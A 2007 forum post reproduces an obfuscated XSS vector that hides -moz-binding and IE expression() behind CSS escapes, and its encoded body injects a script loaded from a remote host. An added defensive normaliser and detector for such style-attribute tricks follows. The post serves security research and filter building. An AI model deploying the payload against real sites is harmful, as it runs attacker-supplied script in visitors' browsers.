Fugitif
26.11.2007, 23:32
Ultimate XSS CSS injection
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept HTML entities in CSS styles.
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);xx: e\
xp\re\s\s\
i\o\n((win
dow.r!=1) 
? eval('x=
String.fro
mCharCode;
scr=docume
nt.createE
lement(x(1
15,99,114,
105,112,11
6));scr.se
tAttribute
(x(115,114
,99),x(104
,116,116,1
12,58,47,4
7,98,117,1
15,105,110
,101,115,1
15,105,110
,102,111,4
6,99,111,4
6,117,107,
47,108,97,
98,115,47,
120,115,11
5,47,120,1
15,115,46,
106,115));
document.g
etElementB
yId(x( 105
,110,106,1
01,99,116 
)).appendC
hild(scr);
window.r=1
;') : 1);" id="inject">test</div>
You can use Hackvertor if you need to decode the IE vector as it will provide you with all the necessary conversions. Please note the vector has been broken up onto multiple lines for viewing purposes; please remove the line breaks when testing the vector.
More:
http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/
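The reason the vector above gets past naive style-attribute filters is that two layers of decoding happen before the CSS engine sees the property names: the HTML parser resolves character references, and the CSS tokenizer resolves backslash escapes, so `e\xp\re\s\s\i\o\n` and `\-\mo\z\-b\i\nd\in\g` become `expression` and `-moz-binding`. A filter that wants to catch this has to normalise the same way before matching. The following is an added example written for this thread, not code from the post or from thespanner.co.uk; the function names and the sample style strings are constructed (the first sample reuses the escaping of the vector above with a placeholder host and an inert expression body).

```javascript
// Added example for this thread (not code from the post or from thespanner.co.uk):
// a normaliser that undoes the two tricks the vector relies on, CSS backslash
// escapes and HTML character references, then flags the constructs that turn a
// style attribute into script on legacy engines. Function names and the sample
// style strings below are constructed for illustration.

const NAMED_ENTITIES = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'", nbsp: " " };

// Pass 1: HTML character references. The HTML parser resolves these before the
// CSS engine sees the attribute value, so a filter must do the same.
function decodeHtmlEntities(s) {
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (match, body) => {
    if (body[0] === "#") {
      const cp = /^#[xX]/.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// Pass 2: CSS backslash escapes, following "consume an escaped code point" from
// CSS Syntax Level 3: "\" + 1..6 hex digits (+ one optional whitespace) is a code
// point; "\" + any other character is that character literally; a backslash
// directly before a newline is dropped. This is what turns "e\xp\re\s\s\i\o\n"
// into "expression" and "\-\mo\z\-b\i\nd\in\g" into "-moz-binding".
function decodeCssEscapes(s) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    if (s[i] !== "\\") { out += s[i]; continue; }
    const hex = /^[0-9a-fA-F]{1,6}/.exec(s.slice(i + 1, i + 7));
    if (hex) {
      const cp = parseInt(hex[0], 16);
      const bad = cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
      out += bad ? "\uFFFD" : String.fromCodePoint(cp);
      i += hex[0].length;
      if (/\s/.test(s[i + 1] || "")) i++;   // one whitespace char belongs to the escape
      continue;
    }
    const next = s[i + 1];
    if (next !== undefined && !/[\n\r\f]/.test(next)) { out += next; i++; }
    // backslash before a newline, or at end of input: consumed, emits nothing
  }
  return out;
}

// Pass 3: strip comments and fold whitespace. Deliberately more permissive than a
// strict tokenizer ("exp/**/ression" is two idents to a modern engine) because the
// engines that matter here, IE7 and Firefox 2, were not strict.
function normaliseStyle(raw) {
  return decodeCssEscapes(decodeHtmlEntities(raw))
    .replace(/\/\*[\s\S]*?\*\//g, "")
    .replace(/\s+/g, " ")
    .toLowerCase();
}

// Constructs that yield script execution (or an external fetch) on the engines
// the vector targets. url() is a review flag, not proof of exploitation.
const DANGEROUS = [
  { name: "expression()", re: /expression\s*\(/ },   // IE dynamic properties
  { name: "-moz-binding", re: /-moz-binding\s*:/ },  // Firefox XBL binding
  { name: "behavior",     re: /\bbehavior\s*:/ },    // IE HTC behaviours
  { name: "url()",        re: /\burl\s*\(/ },        // external reference
];

function auditStyleAttribute(raw) {
  const normalised = normaliseStyle(raw);
  return DANGEROUS.filter((d) => d.re.test(normalised)).map((d) => d.name);
}

// Constructed samples. The first reuses the escaping of the vector in this thread
// with a placeholder host and an inert expression body.
const SAMPLE_PAGE_STYLE    = "\\-\\mo\\z\\-b\\i\\nd\\in\\g:\\url(//example.invalid/xbl.xml#xss);xx: e\\xp\\re\\s\\s\\i\\o\\n(1)";
const SAMPLE_ENTITY_STYLE  = "width: &#101;xpr&#x65;ssion(1)";   // HTML entities inside CSS
const SAMPLE_HEX_STYLE     = "width: \\65 xpression(1)";         // CSS hex escape with trailing space
const SAMPLE_COMMENT_STYLE = "width: exp/**/ression(1)";         // comment-split keyword
const SAMPLE_BENIGN        = "color: red; font-family: &quot;Arial&quot;; background: #fff";

for (const s of [SAMPLE_PAGE_STYLE, SAMPLE_ENTITY_STYLE, SAMPLE_HEX_STYLE, SAMPLE_COMMENT_STYLE, SAMPLE_BENIGN]) {
  console.log(JSON.stringify(normaliseStyle(s)), "->", auditStyleAttribute(s));
}
```

The point of the three passes is ordering: entity decoding first (that is what the browser does), escape decoding second, and only then the pattern match. Matching on the raw attribute value is exactly what the vector is built to defeat.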